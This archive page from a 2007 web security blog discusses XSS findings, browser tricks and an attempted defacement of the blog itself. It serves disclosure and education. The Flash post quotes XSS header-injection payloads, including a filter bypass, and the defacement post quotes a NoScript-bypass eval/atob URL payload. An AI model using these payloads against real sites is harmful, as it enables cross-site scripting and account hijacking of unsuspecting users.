Cenzic 232 Patent
Paid Advertising
web application security lab

Archive for the 'XSS' Category

Open Redirectors Haunt Google Again, in Firefox

Sunday, November 11th, 2007

There’s two really interesting threads, one on pdp’s site and one on Bedford’s site about the use of Firefox’s jar: directive to inject bad content into other people’s site (if they have redirectors in them). Pretty nasty stuff. Turning off all non HTTP directives in Firefox is probably a good idea at this point, given the sheer number of holes that have been identified there.

But this is just another in a list of reasons why Google really does need to shut down these redirectors. Normally it just involves people losing their identities or abusing the trust relationship people have with the Google.com domain. This one can actually steal your information from Google. I’ve been pushing on them for three years now to fix them, and they still haven’t. Granted, this jar: post is really a browser issue and not a redirector issue on Google specifically, but why risk people’s safety when they only purpose for those redirectors is to track their users? I for one vote to shut the redirectors down. Anyway, very interesting articles by pdp and Bedford!

Interesting Video Of BeEF and a Rickroll

Sunday, November 4th, 2007

This is more amusing than anything but if you aren’t familiar with the term Rickroll you should read this first. Click on the link in the article at your own risk - it’s very very annoying. Basically it’s the same old link bomb fun that we have all come to know and love that stops the browser from closing by tons of alerts (I’ve never been sure why the webpage gets to control if the app closes or not). Anyway…

If you aren’t familiar with BeEF, Josh Abraham made a video of himself testing BeEF against himself. He shows how Rickrolls can be used against the user. We are assuming that at this point the attacker has already done everything they wanted to do against the user, and now they are content with annoying them with annoying web-pages. It’s a big video but it definitely shows the power of BeEF as an attack platform.

Owning Ha.ckers.org - Or Not

Sunday, November 4th, 2007

Some people think I’m paranoid - as if the world is out to get me. Honestly, I’ve always just thought I had a healthy dose of reality. As a result I’ve taken some pretty insane precautions with this site to protect it from itself and it’s owners (myself and id). Thankfully, that time was well spent. Although yesterday I realized it probably just wasn’t enough. Sirdarckcat and Kuza55 decided they wanted to own ha.ckers.org by defacing it. Alas, not only were they unsuccessful, but they were unsuccessful in several different ways. Here’s how it _should_ have worked.

Firstly they posted a relevant looking link to one of the posts with a link to a site that I wouldn’t recognize, to social engineer me into looking at it (http://ultimatehxr.googlepages.com/httpresponsespliting.html). Btw, thanks for hosting malicious content, Google - way to keep your site clean! Next, they pop open two iframes - one to the paper in question which is actually written by someone else, and the other to a site (http://www.x.se/xjcj) that performs a redirection to Sirdarckcat’s site (http://www.sirdarckcat.net/blah2.html).

Next, the wannabees attempt to use the CSS history attack to detect if I have posted to this site. In doing so (without JavaScript - thinking that I use NoScript for all my JavaScript protection) they pop open an iframe to my site: (http://ha.ckers.org/xss.swf?a=0:0;a/**/setter=eval;b/**/setter=atob;a=b=name;) which is a vuln in NoScript. The “name” variable corresponds to a huge embedded payload. That payload contains a XMLHTTPRequest that automatically posts their content to this site, with an additional bonus of a tracking pixel so they can see that it worked. Yup, that’s how it should have worked. Nope, it didn’t.

While we have some pretty insanely good mechanisms for protecting this site ultimately we did have one hole, which was rectified by simply removing access to xss.swf - so if you used it for testing, I apologize, you can blame Sirdarckcat and Kuza55 for making your testing harder than it needs to be. I tried to provide access to tools, despite the additional personal burden of upkeep, but when they are abused I have to remove them.

So now the real question is what should I do about it? I went from being pissed off, to dumbfounded and back again. I decided not to post this yesterday for a few reasons, but mostly to collect my thoughts, but I still haven’t come up with anything I’m particularly in love with. Clearly banning won’t work aside from IP bans, and nuking their existing accounts on sla.ckers, both of which they could easily evade, so I’m a little short on options.

Do I publically humiliate them? Do I remove all references to their pages everywhere on the site, since both of their sites should be considered malicious at this point? Do I post their docs? Do I test out the extradition treaties of Mexico and Australia (their respective countries)? Since they were doing it for credit do I show all the ways in which they were insanely sloppy (like building a site with my name on it for testing http://rsnakex.wordpress.com/)? Do I close up shop because my own readers are turning on me for no apparent reason (one of whom I had made a potential offer of a future position within my company - and no, that is no longer on the table)? I’m stumped. But one thing I do know - I’m not wearing a tinfoil hat for nothing.

More Expect Exploitation In Flash

Saturday, November 3rd, 2007

I traded a few emails with Titon (titon[at]bastardlabs.com) regarding the Expect XSS vulnerability in Flash against older versions of Apache. I hadn’t realized that Flash had cloesed down the Expect: header. It appears, however, that there is a way to resurrect that vulnerability. If you recall the old syntax it was:

req.addRequestHeader("Expect","<script>alert('XSS')</script>");

Well it appears that is now blocked in current versions of Flash. However, Triton found a way around that:

req.addRequestHeader("Expect:FooBar","<script>alert('XSS')</script>");

It appears it was doing some sort of pattern match or direct string comparison and by adding anything after the colon you can bypass the protection. Here is an example he created against SecurityFocus. So it looks like the vulnerability is back. It’s surprising how many sites are still vulnerable to this attack. So if you haven’t updated Apache and have any interest in security, you probably should. Nice work by Titon!

Update: Amit alerted me to one f the old papers on flash header injection. The paper came out a year ago. While I don’t think this is exactly the same since this is talking about the expect vuln, it is worthy of mentioning since it’s solved in almost an identical way.

OWASP New Jersey

Monday, October 29th, 2007

So I’m back from the OWASP New Jersey meeting at Verizon. One word - wow. It was a lot different than I thought it would be. I’ve been to dozens of OWASP meetings, and they really vary. I think the smallest meeting I’ve been to was 10 people and now the biggest was the OWASP New Jersey meeting, run by Tom Brennan. The crowd was filled with suits (for once I felt like one of the least well dressed people in the room). Lots of people from local industry (telcom, healthcare, etc…) as well as various three letter agencies.

One thing that came up (that I had known about for a while, but for some reason it’s just not been made super public yet) was some of the work Arian Evans has been doing with HTTP Response splitting. When he started working with it he realized that he was inadvertantly taking out huge chunks of the site with his own content. After some debugging he realized he was hitting caching servers (a la Amit Klein’s work). But there are two nasty things about that that go above and beyond what we knew before.

The first is that it can re-write the caching headers, so that instead of a 5 minute time-out like you intended for your caching server to use, it can be upped to months or years, causing a much larger problem. The second is that is not a one to one, but a one to many relationship. That is, you can take over pages that are well beyond the reach that you normally have - including pages you don’t technically have access to, which can potentially give you access to anything under any user (ultimate persistent XSS). Super nasty! So yah, I wasn’t sure how quiet that was, but Arian finally let the cat out of the bag, so there it is.

So it was a really good conference all in all and definitely worth the hellish travel schedule to get out there. It’ll probably be smaller than the global OWASP meeting in November, of course, but for a simple regional meeting it was really impressive. I also hear rumors of a World CON in New York City next year. I for one, am looking forward to it.

Update: I should go back and read all the old Amit papers. He came up with all of this stuff years ago. Is there anything that guy hasn’t done? His two papers are here and here.

TJMaxx XSS Vulnerability

Sunday, September 23rd, 2007

You know, normally I wouldn’t care less about finding yet another XSS in some retailer site, but in this case I think it’s worth mentioning. There’s a documentary crew doing something on hackers that came to Austin and interviewed several people (not sure when it’s coming out but I’ll probably mention it when it does). Anyway, during the interview I was asked to take a quick look at TJMaxx and sure enough within a few seconds I found this vuln:

Click here then click on the post forwarder as an example.

The ironies here are only obvious once you see TJMaxx’s page which has a huge customer alert on the top of the page. It’s a letter from the CEO of TJMaxx, Carol Meyrowitz:

We remain committed to providing our customers a safe shopping environment as you shop for great values, fashion and brands. TJX has been working diligently with some of the world’s best computer security firms to further enhance our computer security. We have also continued to work with law enforcement and government agencies and very much want to see that the sophisticated cyber criminals who attacked our computer systems are brought to justice.

I can’t comment on who is doing the audit work for TJMaxx as I have no idea, but I’d doubt if I’d call them the best in the world given the current state of the site. Anyhow, the real reason I mention this is I have no evidence whatsoever that TJMaxx has been actually hurt by this event. If you look at the TJMaxx 1 year stock chart not only did they recover from the huge security breach in Feb, but they’re actually up! Clearly, the consumers and the investment community has decided to overlook their issues. Strange.

So perhaps the cost of data security isn’t worth it. I can only count a few pieces of anecdotal evidence where people have said they’d never shop there as a result - then they said that they’d just never use their credit card. So in the end, that works out to be in TJMaxx’s benefit because they don’t have to pay the transaction fees that the credit card companies impose. I don’t have insight into their financials (I guess I could dig up their public earnings statements) but I have a feeling that although this was relatively bad, it was barely a bump in their earnings. Perhaps their settlement cost them a little, but is it really enough to make them fix their holes? Clearly they’re still vulnerable to some things - and without knowing who is doing their security it’s tough to say how good or bad they are. Does this set a bad precedence? Is it that any publicity is good publicity - even if it puts millions of consumers at risk? What a mess!

Another XSS In Google Search Appliance

Friday, September 21st, 2007

$30,000 and vulnerabilities to boot! Google’s search appliance appears to be vulnerable to another XSS vulnerability, according to Mustlive’s disclosure. It comes complete with a Google dork. Not good. Mustlive has contacted Google, who to my knowledge has not let their customers know that they are vulnerable - if I’m wrong, someone please correct me.

Here are a few examples: gsa.icann.org and search.york.ac.uk.

This obviously puts any site that uses Google’s search appliance with this particular vulnerability in it at risk (there are, as of this writing 186,000 listings on the Google dork). Time to patch up - once Google comes out with one, that is.

Overwriting Attributes

Thursday, August 30th, 2007

There’s an interesting thread on sla.ckers about how Firefox overwrites attributes. The short of it is if you have attribute=”false” followed by attribute=”true” the second attribute overwrites the first. This is definitely not the first time I’ve come across this, and if you think about it, it makes sense - one of them has to win, so it’s a tossup as to which one should. So for the most part I totally ignored that phenomena, chalking it up to potentially problematic, but difficult or impossible to exploit in any useful way. However, that was until this thread.

One thing that MySpace does, for instance, is add the attribute allowScriptAccess=”never” to any object tags, neutering their effectiveness in an attack. However, if you immediately follow it up with your own attribute allowScriptAccess=”always” it will override MySpace’s security settings (I don’t know if there is a working exploit out there for this - it’s just an example as far as I know). However, now it’s clear that there could be situations where there are other attributes that users are allowed to write into, that in all other ways prevent XSS, but allow you to change the functionality of the tag you are within. Clever attack!

XSS and Possible Information Disclosure in Urchin

Thursday, August 23rd, 2007

Fredrick Young send an interesting tidbit over to me today. Apparently all sites that run Urchin’s console are vulnerable to XSS. Urchin (recently bought by Google) is web tracking software designed for log analysis. It’s actually some of the best software out there in terms of speed of log analysis. I heard rumors that lots of the backend was originally coded in assembler. Cool stuff. Anyway, after a few minutes of looking I found an example of this out on the web. Click here for an example. This brings up a few interesting points.

Firstly, it’s not running on port 80 so the same origin policy is irrelevant. Secondly, lots of people use this software, and lots of the companies who use it need to be PCI compliant, which means that all of the companies who have exposed this interface are now failing PCI. Not so nice.

Also, when locating this particular example I noticed that I don’t think the password protection actually stops you from viewing the logs directly as you can see here. Bummer. Being able to read logs could lead to disclosure of hidden files, internal IP addresses, and all kinds of other things submitted on the URL. Looks like Urchin needs a few patches. I actually like this software a lot and if I had lots of money I’d probably buy it. It’s the same back end as Google Analytics although minus the fact that Google can spy on you and your users. But it’s got a few issues.

XSS Hole In Google Apps Is “Expected Behavior”

Friday, August 17th, 2007

You know, just when I think I’m being a super nice guy, and I go out of my way to go through responsible disclosure, I am slapped in the face with the exact reason why I don’t think responsible disclosure works for some companies. Certain companies I have worked with are ultra responsive, understand risks, and do their absolute best to combat anything that may be used to harm them or their consumers. Then there’s Google:

Hi RSnake,

On further review, it turns out that this is not a bug, but instead the expected behavior of this domain. Javascript is a supported part of Google modules, as seen, for example, here: http://www.google.com/apis/maps/documentation/mapplets/#Hello_World_of_Mapplets. Since these modules reside on the gmodules.com domain instead of the Google domain, cross-domain protection stops them from being used to steal Google-specific cookies, etc. If you do find a way of executing this code from the context of a google.com domain, though, please let us know.

If I misunderstood the report in any way, please don’t hesitate to correct me. For the moment, though, I’m closing this issue. Thanks for sending this over.

Regards,
The Google Team

BZZZT! Wrong answer. Thank you for playing though. On further review, Google needs to figure out what XSS is used for - it’s not just for credential theft. You couldn’t make this stuff up if you tried. Putting phishing sites on gmodules.com is apparently expected behavior. My favorite part of this email is where Google explains how cross domain policies work. I’m simply not impressed. Click here to see the XSS hole. I’ll let the JavaScript injected on Google branded domains do the talking for me.

So for anyone interested in exploiting this non-bug, they would tell people to add their own modules, which are hijacked, of course, allowing them to take over other people’s websites when they embedded the erroneous third party code. Kinda nasty. Unlikely, but nasty. More likely it would simply be in phishing sites that didn’t want their sites taken down, but wanted Google’s to be taken down instead. For the record, this is not the first time I have responsibly disclosed issues to Google, and this is the third time they have said what I reported was either not a bug or too hard to fix. So much for using responsible disclosure with Google. Ugh.